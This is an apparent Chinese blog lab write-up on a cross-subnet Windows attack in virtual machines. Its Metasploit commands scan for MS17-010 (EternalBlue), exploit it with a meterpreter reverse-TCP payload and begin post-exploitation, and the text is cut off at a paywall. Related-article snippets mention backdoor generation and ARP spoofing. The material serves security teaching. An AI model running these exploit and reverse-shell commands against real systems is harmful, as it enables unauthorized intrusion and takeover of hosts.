Windows网络服务渗透测试实战-跨网段攻击

最新推荐文章于 2023-12-13 13:32:25 发布
最新推荐文章于 2023-12-13 13:32:25 发布
阅读量764 收藏 5
点赞数 3
分类专栏: 面试 阿里巴巴 文章标签: windows 安全 web安全 qt 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67393686/article/details/125345991
版权
本文详细介绍了如何进行Windows跨网段攻击,通过Metasploit利用永恒之蓝漏洞扫描并攻击目标主机,最终获取WinXP系统管理员权限并实现远程关机。
摘要由CSDN通过智能技术生成

一、实验项目名称

Windows网络服务渗透测试实战-跨网段攻击

二、实验目的及要求

掌握对跨网段攻击的方法。

熟悉Metasploit终端的使用方法。

熟悉通过meterpreter进行后渗透操作

获取winxp系统管理员admin的密码,并使xp系统关机

----基础配置----

**1、**选择win7

2、选择winXP

**3、**选择kali

**4、**查看kali的ip

**5、**查看winXP的ip

**6、**查看win7的IP

总结如下:

WinXP

Win7

Kali

网络适配器 桥接模式(自动)

192.168.43.99

网络适配器 桥接模式(自动)

192.168.43.89

网络适配器 NAT

192.168.232.128

网络适配器2 NAT

192.168.232.145

----开始跨网段攻击----

1、输入 msfconsole 启动metasploit

2、使用“永恒之蓝”的漏洞模块,使用扫描命令进行网段内主机扫描

use auxiliary/scanner/smb/smb_ms17_010 //进入扫描模块

set rhosts (目标网段) //扫描目标网段内的主机

set threads 512 //设置扫描线程

run //执行

3、设置攻击步骤进行攻击

use exploit/windows/smb/ms17_010_eternalblue //利用攻击模块

set rhost (目标IP) //设置目标IP

set lhost (监听主机IP) //设置监听IP

set payload windows/x64/meterpreter/reverse_tcp //设置攻击载荷

run

4、通过meterpreter终端获取系统控制台shell,执行ipconfig发现主机存在双网段

5、获取shell权限,在cmd窗口试图下输入 arp -a 可以发现,存在同网段的地址

<
最低0.47元/天 解锁文章
m0_67393686
关注
专栏目录
课设之网段攻击
qq_51558360的博客
06-26 1772
网段攻击
Kali利用msf渗透Windows电脑(超详细)
最新发布
Galaxy_0的博客
08-19 1390
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
网段攻击
moli_a的博客
05-05 1227
网段攻击
ONE DAY |网络安全渗透测试网段攻击
EverUP
05-04 2436
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。
好文转载 ONE DAY |网络安全渗透测试网段攻击
AI_data_cloud的博客
05-05 1017
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。
渗透测试实战 - 外网渗透内网穿透(超详细)
HAKUNAMATATATTA的博客
02-18 8371
渗透测试实验,外网渗透和内网穿透的详细操作过程以及内网代理和内网探测的方法
渗透测试实战之ARP欺骗攻击(ARP断网攻击
爱玩游戏的黑客的博客
12-13 2611
渗透测试实战之ARP欺骗攻击(ARP断网攻击
web安全攻防渗透测试实战指南
weixin_67846882的博客
04-07 5092
1.Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 --exclude 19...
网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)
weixin_42474227的博客
12-30 9674
永恒之蓝 MS17-010漏洞复现 学好网络安全,保护自己,保护家人
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
墨鱼菜鸡
07-11 5860
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的): 英文文档:https://nmap.org/book/man.html中文文档:https://nmap.org/man/zh/index.html#man-description官方 Nmap 项目指南:https://nmap.org/book/toc.html ...
网段攻击模拟实验
weixin_65336001的博客
05-05 784
网络安全小白初学者——网段攻击
另外网段渗透测试
Rainbow_Melo
06-22 1312
对172.16.88.0/24网段爆破 爆破出来rdp(3389) 登陆172.16.88.132,以system权限执行木马程序弹shell到CS上 然后再mimkazi,抓取到新的密码之后hash传递撞库 登陆132的3389之后发现对130(未开3389)的机器开了IPC$通道,管理员开的(太幸运了) 可以看到Z盘,Z盘是IPC建立连接之后的共享主机的C盘,这里可以看出管理员之前建立了IPC连接 IPC$命令net sessions 看开了几个 然后写bat文件内容包括“创建用户 将用户添加到管
Metasploit 「网段攻击」添加路由表
时光途径
06-09 5740
情况? Mac【Metasploit】:192.168.43.100 Win7【跳板机】:192.168.215.144【Nat】、172.16.63.128【仅主机】 Linux【目标机】:172.16.63.129【仅主机】,开启80端口方便检测验证 需要解释下这里跳板机为啥采用Nat方式获取ip,而不是桥接?因为主机Mac上网是连的CMCC-EDU,在校也很无奈额... ...
利用公网Msf+MS17010网段攻击内网
浅笑996的博客
06-29 2665
其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。 一、准备工作 1.安装了Msf的公网主机+Ubuntu系统 2.一台其他服务器内网存在445漏洞 3.细心,细心,细心,钻研,钻研!!! 二、反弹一个shell 第一步:公网主机操作 生成msf木马: msfvenom -p windows/meter
Kali实现局域网ARP欺骗和ARP攻击
热门推荐
tiaotiaolong99234的博客
05-29 2万+
Kali实现局域网ARP欺骗和ARP攻击 ...
Web渗透测试-实战 方法 思路 总结
m0_55595611的博客
02-21 9564
尽可能的搜集目标的信息 端口信息 DNS信息 员工邮箱 信息搜集的分类 1、主动式信息搜集(可获取到的信息较多,但易被目标发现) 2、通过直接发起与被测目标网络之间的互动来获取相关信息,如通过Nmap扫描目标系统。 3、被动式信息搜集(搜集到的信息较少,但不易被发现) 4、通过第三方服务来获取目标网络相关信息。如通过搜索引擎方式来搜集信息。 搜索引擎 Google hacking 常用搜索语法: intitle:KEYWORD //搜索网页标题中含有关键词的网页 intext:KEYWORD //搜索站
渗透测试流程与内网渗透测试实战
悦分享
07-15 7471
关于免杀,我使用的全部是msf的编码自免杀,64位使用的是x64/zutto_dekiru,32位使用的是x86/shikata_ga_nai,360都没有拦截。虽然靶机中有360,但是我直接上传的mimikatz也没有被杀,所以我有些怀疑是360的版本比较低,除了web服务器上传的第一个payload,其它都进行了编码处理,而第一个也确实没有执行成功,这说明360至少对第一个payload是拦截了的。
msf手机渗透二(实现外网渗透)
weixin_63204687的博客
11-07 3368
在内网穿透官网注册飞鸽内网穿透开通隧道,然后本地端口与公网端口绑定,这样访问公网的所有请求最后都会传入本地端口。在本地生成apk的时候使用公网IP和对应Port而对其进行监听的时候设置本地IP和port。这样app在别人手机上被点击以后会直接链接公网对应IP端口,因为公网的已经和本地的绑定了,并且在电脑监听的时候监听的是本地端口,所以最后链接返回给本地电脑。使用公网开通隧道本质上是一个桥梁作用,连接了不同局域网之间的通信。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值